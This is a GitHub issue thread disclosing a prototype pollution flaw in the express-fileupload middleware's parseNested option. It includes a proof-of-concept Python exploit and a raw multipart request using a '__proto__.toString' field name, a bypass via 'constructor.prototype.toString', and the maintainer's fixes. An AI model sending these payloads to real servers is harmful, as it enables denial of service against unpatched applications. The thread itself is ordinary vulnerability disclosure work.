search

richardgirges / express-fileupload

Simple express file upload middleware that wraps around busboy
MIT License
1.52k stars 261 forks source link

Prototype Pollution #236

Closed po6ix closed 4 years ago

po6ix commented 4 years ago

This module has prototype pollution vulnerablity and it can make DOS with parseNested option.

server

const express = require('express');
const fileUpload = require('express-fileupload');
const app = express();

app.use(fileUpload({ parseNested: true }));

app.get('/', (req, res) => {
    res.end('express-fileupload poc');
});

app.listen(7777)

exploit

import requests

res = requests.post('http://p6.is:7777', files = {'__proto__.toString': 'express-fileupload poc'});

raw packet

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------1566035451
Content-Length: 137

----------1566035451
Content-Disposition: form-data; name="__proto__.toString"; filename="filename"

content
----------1566035451--

Full description is in here https://blog.p6.is/Real-World-JS-1/

richardgirges commented 4 years ago

Thanks for reporting this. Fix has been applied and published to NPM: https://github.com/richardgirges/express-fileupload/releases/tag/1.1.8

securityMB commented 4 years ago

@richardgirges The fix can be bypassed. Instead of referencing __proto__.toString, one can reference constructor.prototype.toString.

richardgirges commented 4 years ago

Thanks @securityMB - it has been fixed and a second deprecation notice has been posted on NPM for all prior versions.

ghost commented 4 years ago

https://www.bleepingcomputer.com/news/security/nodejs-module-downloaded-7m-times-lets-hackers-inject-code/ They just announced in the news about this today.. yet you claim to have fixed it 5 days ago.. love how far the news is behind on this.. thanks for the quick fix of this issue! Someone should contact the news folks..

richardgirges commented 4 years ago

Thanks for the heads up on this @naraphox